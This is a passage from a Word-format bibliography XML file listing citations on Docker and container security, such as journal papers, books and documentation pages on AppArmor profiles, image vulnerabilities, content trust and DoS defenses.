            <b:Last>Zhu</b:Last>
            <b:First>H</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Gehrmann</b:Last>
            <b:First>C</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Lic-Sec: An enhanced AppArmor Docker security profile generator</b:Title>
    <b:JournalName>Journal of Information Security and Applications</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>102924</b:Pages>
    <b:Volume>61</b:Volume>
    <b:RefOrder>42</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AEf20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{2ACA274A-DD39-4D0D-A844-F3E245EAF336}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Efe</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Aslan</b:Last>
            <b:First>U</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Securing Vulnerabilities in Docker Images</b:Title>
    <b:JournalName>International Journal of Innovative Engineering Applications</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>31-39</b:Pages>
    <b:Volume>4</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>43</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SGa16</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{8813F335-E06F-4668-8B50-F99A48EBE465}</b:Guid>
    <b:Title>Securing Docker</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gallagher</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>Packt Publishing</b:Publisher>
    <b:RefOrder>44</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{466AC119-8742-4C19-A44B-82DB3FD80F36}</b:Guid>
    <b:Title>Content trust in Docker | Docker Documentation</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:Corporate>docker</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>15</b:DayAccessed>
    <b:URL>https://docs.docker.com/engine/security/trust/</b:URL>
    <b:RefOrder>47</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>git21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{133D9832-CB27-4886-B794-89AE824B1F80}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>github</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>GitHub - theupdateframework/notary: Notary is a project that allows anyone to have trust over arbitrary collections of data</b:Title>
    <b:ProductionCompany>github</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>12</b:DayAccessed>
    <b:URL>https://github.com/theupdateframework/notary</b:URL>
    <b:RefOrder>48</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>doc161</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{AD705D76-64F6-4762-9A17-FAA90E80B05D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>docker </b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>docker</b:Title>
    <b:ProductionCompany>docker </b:ProductionCompany>
    <b:Year>2016</b:Year>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>11</b:DayAccessed>
    <b:URL>https://docs.docker.com/network/</b:URL>
    <b:RefOrder>45</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>TCo16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{DDA53906-6BA2-4A60-B229-9DCBC621567C}</b:Guid>
    <b:Title>To Docker or Not to Docker: A Security Perspective</b:Title>
    <b:Year>2016</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Combe</b:Last>
            <b:First>T</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Martin</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Pietro</b:Last>
            <b:First>R</b:First>
            <b:Middle>Di</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>IEEE Cloud Computing</b:JournalName>
    <b:Pages>54-62</b:Pages>
    <b:Volume>5</b:Volume>
    <b:Issue>3</b:Issue>
    <b:RefOrder>46</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DMe14</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{83AD95EF-ED77-435A-A80C-8DFB305DEA1A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Merkel</b:Last>
            <b:First>D</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker: lightweight linux containers for consistent development and deployment</b:Title>
    <b:JournalName>Linux journal</b:JournalName>
    <b:Year>2014</b:Year>
    <b:Pages>1-5</b:Pages>
    <b:Volume>239</b:Volume>
    <b:Issue>2</b:Issue>
    <b:RefOrder>49</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>XXu20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{D5D9BCE3-0BC8-46E7-ADCB-3E870ED0ACFD}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Xu</b:Last>
            <b:First>X</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Xu</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Jiang</b:Last>
            <b:First>Y</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Research on Security Issues of Docker and Container Monitoring System in Edge Computing System</b:Title>
    <b:JournalName>Journal of Physics</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>012067</b:Pages>
    <b:Volume>1673</b:Volume>
    <b:RefOrder>50</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RYa18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{1BE02C60-D665-4A9D-AB6C-ADE2A7BAA7B8}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Yasrab</b:Last>
            <b:First>R</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Mitigating Docker Security Issues</b:Title>
    <b:JournalName>arXiv preprint arXiv:1804.05039</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>1-11</b:Pages>
    <b:RefOrder>51</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ZJi17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{816E88D6-9AEF-4037-AB78-41C371CD1398}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Jian</b:Last>
            <b:First>Z</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Chen</b:Last>
            <b:First>L</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A Defense Method against Docker Escape Attack</b:Title>
    <b:JournalName>Proceedings of the 2017 International Conference on Cryptography, Security and Privacy</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>142-146</b:Pages>
    <b:RefOrder>52</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MDe19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{85FB663B-D2FF-4004-94F9-BA78A579D13E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Benedictis</b:Last>
            <b:First>M</b:First>
            <b:Middle>De</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Lioy</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Integrity verification of Docker containers for a lightweight cloud environment</b:Title>
    <b:JournalName>Future Generation Computer Systems</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages>236-246</b:Pages>
    <b:Volume>97</b:Volume>
    <b:RefOrder>53</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>OWA21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{036A6512-3414-4C7D-8EA3-B4E924F74965}</b:Guid>
    <b:Title>Docker Security Cheat Sheet</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>OWASP</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>OWASP</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>14</b:DayAccessed>
    <b:URL>https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html</b:URL>
    <b:RefOrder>55</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>EWi14</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{459129CA-BE22-42CB-8D39-64EE7505222E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Windisch</b:Last>
            <b:First>E</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>On the Security of Containers</b:Title>
    <b:Year>2014</b:Year>
    <b:Month>October</b:Month>
    <b:Day>23</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>15</b:DayAccessed>
    <b:URL>https://medium.com/@ewindisch/on-the-security-of-containers-2c60ffe25a9e</b:URL>
    <b:RefOrder>56</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JRu14</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{2BFFA576-F209-4664-97B7-D3E0D92CE5F4}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Rudenberg</b:Last>
            <b:First>J</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker Image Insecurity</b:Title>
    <b:Year>2014</b:Year>
    <b:Month>December</b:Month>
    <b:Day>23</b:Day>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>16</b:DayAccessed>
    <b:URL>https://titanous.com/posts/docker-insecurity</b:URL>
    <b:RefOrder>58</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>DFG21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{ACCF6E93-0D58-4E21-B541-336F845EDD2D}</b:Guid>
    <b:Title>SecDocker: Hardening the Continuous Integration Workflow Wrapping the container layer</b:Title>
    <b:Year>2021</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gonz´alez</b:Last>
            <b:First>D</b:First>
            <b:Middle>F.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Lera</b:Last>
            <b:First>F</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Esteban</b:Last>
            <b:First>G</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>arXiv e-prints</b:JournalName>
    <b:Pages>1-15</b:Pages>
    <b:RefOrder>59</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JCh16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{8633B0E5-F685-4D46-8DCA-9041D9660DB7}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Chelladhurai</b:Last>
            <b:First>J.</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Chelliah</b:Last>
            <b:First>P</b:First>
            <b:Middle>R.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Kumar</b:Last>
            <b:First>S</b:First>
            <b:Middle>A.</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Securing docker containers from Denial of Service (DoS) attacks</b:Title>
    <b:JournalName>Proceedings - 2016 IEEE International Conference on Services Computing, SCC 2016</b:JournalName>
    <b:Year>2016</b:Year>
    <b:Pages>856-859</b:Pages>
    <b:RefOrder>60</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MId21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{19174695-A44C-49D2-B901-00A4C3C36DE0}</b:Guid>
    <b:Title>Implementation of Web Server Security Against Denial of Service (DoS) Attacks</b:Title>
    <b:JournalName>Workshop on Environmental Science, Society, and Technology (WESTECH 2020)</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>1-6</b:Pages>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Idhom</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Alit</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Fauzi</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>61</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SSh20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{9245C390-5416-4AD9-A58A-EE9896C2112E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Shakeri</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Veen</b:Last>
            <b:First>L</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Grosso</b:Last>
            <b:First>P</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Evaluation of Container Overlays for Secure Data Sharing</b:Title>
    <b:JournalName>Proceedings - 2020 IEEE 45th Local Computer Networks Symposium on Emerging Topics in Networking, LCN Symposium 2020</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>99-108</b:Pages>
    <b:RefOrder>62</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MDa18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{48EE0997-DBA2-4BEE-9710-BC5B1BA95389}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Data</b:Last>
            <b:First>M</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Defense Against ARP Spoofing Attack Using Semi-Static ARP Cache Table</b:Title>
    <b:JournalName>3rd International Conference on Sustainable Information Engineering and Technology, SIET 2018 - Proceedings</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>206-210</b:Pages>
    <b:RefOrder>63</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MKh20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{05AFBA46-C064-4159-8EE1-70ECCF02E10F}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Khan</b:Last>
            <b:First>M</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rehman</b:Last>
            <b:First>O</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Lightweight Testbed for Cybersecurity Experiments in SCADA-based Systems</b:Title>
    <b:JournalName>2020 International Conference on Computing and Information Technology, ICCIT 2020</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>1-5</b:Pages>
    <b:RefOrder>64</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>LLM20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{0FEA7E7F-679E-440F-8F31-4CADA66CEDC5}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mentz</b:Last>
            <b:First>L</b:First>
            <b:Middle>L</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Loch</b:Last>
            <b:First>W</b:First>
            <b:Middle>J</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Koslovski</b:Last>
            <b:First>G</b:First>
            <b:Middle>P</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparative experimental analysis of Docker container networking drivers</b:Title>
    <b:JournalName>Proceedings - 2020 IEEE 9th International Conference on Cloud Networking, CloudNet 2020</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>1-7</b:Pages>
    <b:RefOrder>65</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Doc21</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4D2AC400-2EB5-4B7D-88FA-D3182A08C6D8}</b:Guid>
    <b:Title>Use bridge networks</b:Title>
    <b:Author>
      <b:Author>
        <b:Corporate>Docker Documentaion</b:Corporate>
      </b:Author>
    </b:Author>
    <b:ProductionCompany>Docker</b:ProductionCompany>
    <b:YearAccessed>2021</b:YearAccessed>
    <b:MonthAccessed>July</b:MonthAccessed>
    <b:DayAccessed>21</b:DayAccessed>
    <b:URL>https://docs.docker.com/network/bridge/</b:URL>
    <b:RefOrder>66</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>JNa20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{032716B3-2A2F-47B5-880D-655451F967FA}</b:Guid>
    <b:Title>BASTION: A Security Enforcement Network Stack for Container Networks</b:Title>
    <b:Year>2020</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Nam</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Lee</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Seo</b:Last>
            <b:First>H</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>2020 USENIX Annual Technical Conference</b:JournalName>
    <b:Pages>81-95</b:Pages>
    <b:RefOrder>67</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NGe17</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{4E064D88-E439-47B5-BED1-8A26AEE56C1E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gelernter</b:Last>
            <b:First>N</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Kalma</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Magnezi</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Porcilan</b:Last>
            <b:First>H</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>The Password Reset MitM Attack</b:Title>
    <b:JournalName>Proceedings - IEEE Symposium on Security and Privacy</b:JournalName>
    <b:Year>2017</b:Year>
    <b:Pages>251-267</b:Pages>
    <b:RefOrder>68</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SUp16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{E9C5539E-7C17-48E3-95E1-8ECB6C104C36}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Upadhya</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Shetty</b:Last>
            <b:First>J</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Rajeshwari</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A State-of-Art Review of Docker Container Security Issues and Solutions</b:Title>
    <b:JournalName>American International Journal of Research in Science, Technology, Engineering \&amp; Mathematics</b:JournalName>
    <b:Year>2016</b:Year>
    <b:Pages>33-36</b:Pages>
    <b:Volume>17</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>57</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AMo15</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{D208BBA7-F170-41F8-9688-9D1127B3D756}</b:Guid>
    <b:Title>Docker Security: Using Containers Safely in Production</b:Title>
    <b:Year>2015</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mouat</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Publisher>O'Reilly Media</b:Publisher>
    <b:RefOrder>69</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>GIR19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{09F0A808-E3FA-45CD-8DEC-E7F8E076EBDE}</b:Guid>
    <b:Title>Comparative Analysis of Virtualization Methods in Big Data Processing</b:Title>
    <b:Year>2019</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Radchenko</b:Last>
            <b:First>G</b:First>
            <b:Middle>I</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Alaasam</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Tchernykh</b:Last>
            <b:First>A</b:First>
            <b:Middle>N</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:JournalName>Supercomputing Frontiers and Innovations</b:JournalName>
    <b:Pages>48-79</b:Pages>
    <b:Volume>6</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>70</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ARM16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{8F36793F-49EA-4F02-95BB-305C860AF650}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Manu</b:Last>
            <b:First>A</b:First>
            <b:Middle>R</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Patel</b:Last>
            <b:First>J</b:First>
            <b:Middle>K</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Akhtar</b:Last>
            <b:First>S</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>A study, analysis and deep dive on cloud PAAS security in terms of Docker container security</b:Title>
    <b:JournalName>Proceedings of IEEE International Conference on Circuit, Power and Computing Technologies, ICCPCT 2016</b:JournalName>
    <b:Year>2016</b:Year>
    <b:Pages>1-13</b:Pages>
    <b:RefOrder>71</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SMa18</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{74CD12B9-F60A-49CF-975C-802061F608C5}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Maheshwari</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Deochake</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>De</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Comparative Study of Virtual Machines and Containers for DevOps Developers</b:Title>
    <b:JournalName>arXiv preprint arXiv:1808.08192</b:JournalName>
    <b:Year>2018</b:Year>
    <b:Pages>1-9</b:Pages>
    <b:RefOrder>72</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>VJa21</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{508D4A41-6D73-4743-94CB-9530AF050F18}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Jain</b:Last>
            <b:First>V</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Singh</b:Last>
            <b:First>B</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Static Vulnerability Analysis of Docker Images</b:Title>
    <b:JournalName>IOP Conference Series: Materials Science and Engineering</b:JournalName>
    <b:Year>2021</b:Year>
    <b:Pages>12-18</b:Pages>
    <b:Volume>1131</b:Volume>
    <b:Issue>1</b:Issue>
    <b:RefOrder>73</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SSu19</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{882E1973-7071-4BD3-B9B2-9201D580FEB7}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sultan</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Ahmad</b:Last>
            <b:First>I</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Dimitriou</b:Last>
            <b:First>T</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Container Security: Issues, Challenges, and the Road Ahead</b:Title>
    <b:JournalName>IEEE Access</b:JournalName>
    <b:Year>2019</b:Year>
    <b:Pages> 52976-52996</b:Pages>
    <b:Volume>7</b:Volume>
    <b:RefOrder>74</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>SPM20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{35C5B285-9B73-4BE2-AE24-16D22B6ACE76}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mullinix</b:Last>
            <b:First>S</b:First>
            <b:Middle>P.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Konomi</b:Last>
            <b:First>E</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Davis</b:Last>
            <b:First>R</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>On Security Measures for Containerized Applications Imaged with Docker</b:Title>
    <b:JournalName>arXiv preprint arXiv:2008.04814</b:JournalName>
    <b:Year>2020</b:Year>
    <b:RefOrder>75</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>KBr20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{B5C74AE4-3FDB-49EF-AE7C-3438D8E9DF93}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Brady</b:Last>
            <b:First>K</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Moon</b:Last>
            <b:First>S</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Nguyen</b:Last>
            <b:First>T</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker Container Security in Cloud Computing</b:Title>
    <b:JournalName>2020 10th Annual Computing and Communication Workshop and Conference, CCWC 2020</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>975-980</b:Pages>
    <b:RefOrder>76</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ATo20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{EC7FF342-91FE-423C-8690-3104257CA550}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Tomar</b:Last>
            <b:First>A</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Jeena</b:Last>
            <b:First>D</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Mishra</b:Last>
            <b:First>P</b:First>
          </b:Person>
          <b:Person>
            <b:Last>al</b:Last>
            <b:First>et</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Docker security: A threat model, attack taxonomy and real-time attack scenario of DoS</b:Title>
    <b:JournalName>Proceedings of the Confluence 2020 - 10th International Conference on Cloud Computing, Data Science and Engineering</b:JournalName>
    <b:Year>2020</b:Year>
    <b:Pages>150-155</b:Pages>
    <b:RefOrder>77</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AAM16</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{0D4BBA38-2902-4F54-BCA5-1AE49C74560B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Mohallel</b:Last>
            <b:First>A</b:First>
            <b:Middle>A.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Bass</b:Last>
            <b:First>J</b:First>
            <b:Middle>M.</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Dehghantaha</b:Last>
            <b:First>A</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Experimenting with Docker: Linux Container and base OS attack surfaces</b:Title>
    <b:JournalName>International Conference on Information Society, i-Society 2016</b:JournalName>
